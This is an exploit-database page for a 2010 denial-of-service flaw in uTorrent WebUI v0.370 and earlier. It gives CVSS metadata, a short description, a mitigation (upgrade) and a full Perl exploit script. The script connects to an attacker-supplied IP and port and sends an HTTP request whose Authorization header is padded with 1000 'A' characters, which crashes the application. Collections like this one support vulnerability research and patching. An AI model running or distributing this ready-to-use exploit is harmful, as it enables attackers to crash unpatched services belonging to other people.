uTorrent WebUI - exploit.company

vendor:

uTorrent WebUI

by:

zombiefx

7,5

CVSS

HIGH

Denial of Service (DoS)

CWE

Product Name: uTorrent WebUI

Affected Version From: uTorrent WebUI <= v0.370

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2010

uTorrent WebUI <= v0.370 Authorization header DoS Exploit

This exploit is a Denial of Service (DoS) vulnerability in uTorrent WebUI <= v0.370. It is triggered by sending a maliciously crafted HTTP request with an Authorization header containing a large number of 'A' characters. This causes the application to crash.

Mitigation:

Upgrade to the latest version of uTorrent WebUI.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# Exploit Title: uTorrent WebUI <= v0.370 Authorization header DoS Exploit
# Date: 2010-04-01
# Author: zombiefx darkernet[at]gmail.com<http://gmail.com>
# Version: µTorrent 2.0 (build 18488) / WebUI <=v0.370
# Tested on: Windows XP SP3
#Code:
# lame usage: ./UTweb.pl <IP> <PORT>
# EAX 00000000 ECX 00000000 EDX 00000001 EBX 003D8360 ASCII "admin" ESP 0141FE94
# EBP 0141FF08 ESI 00000000 EDI 01511958 EIP 0041BC62 uTorrent.0041BC62
# Good luck! corelanc0d3r

use warnings;
use strict;
use IO::Socket;
my $nonbase64 = "\x41" x 1000; # That was pointless
my $sock = IO::Socket::INET->new(PeerAddr =>$ARGV[0],PeerPort =>$ARGV[1],Proto => 'tcp');
print $sock "GET / HTTP/1.1\r\n".
"Authorization: Basic $nonbase64\r\n\r\n";